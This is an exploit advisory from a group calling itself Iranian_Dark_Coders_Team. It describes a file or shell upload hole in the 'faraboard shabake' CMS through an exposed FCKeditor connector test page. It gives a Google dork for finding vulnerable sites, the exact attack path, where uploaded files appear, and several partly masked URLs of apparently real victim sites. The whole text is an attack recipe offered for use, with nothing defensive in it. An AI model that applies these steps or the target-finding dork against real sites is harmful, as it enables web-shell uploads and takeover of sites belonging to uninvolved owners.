####################################################### # [+] Exploit Title:Vulnerability cms faraboard shabake # [+] Google Dork:intext:"طراحی و اجرا فرابرد شبکه" # [+] Date: 11-10-2014 # [+] Exploit Author: Iranian_Dark_Coders_Team # [+] Home : http://www.idc-team.net/ # [+] Discovered By : am22 # [+] Category: webapps # [+] Tested on: Windows 7 # Risk : high # Operation : file or shell upload # Cms Home :http://www.farabord.com Exploit :http://site.com/fckeditor/editor/filemanager/browser/default/connectors/test.html then see file from this link http://site.com/files/filebox/File/fileUpload.Html Demo : http://wwXXehclinic.com/fckeditor/editor/filemanager/browser/default/connectors/test.html http://natXXfahansport.ir/fckeditor/editor/filemanager/browser/default/connectors/test.html http://wwXXXco.ir/fckeditor/editor/filemanager/browser/default/connectors/test.html Discovered By : Am22 Sp Tnx : M.R.S.CO,n30,Black.Hack3r,and all member idc-team.net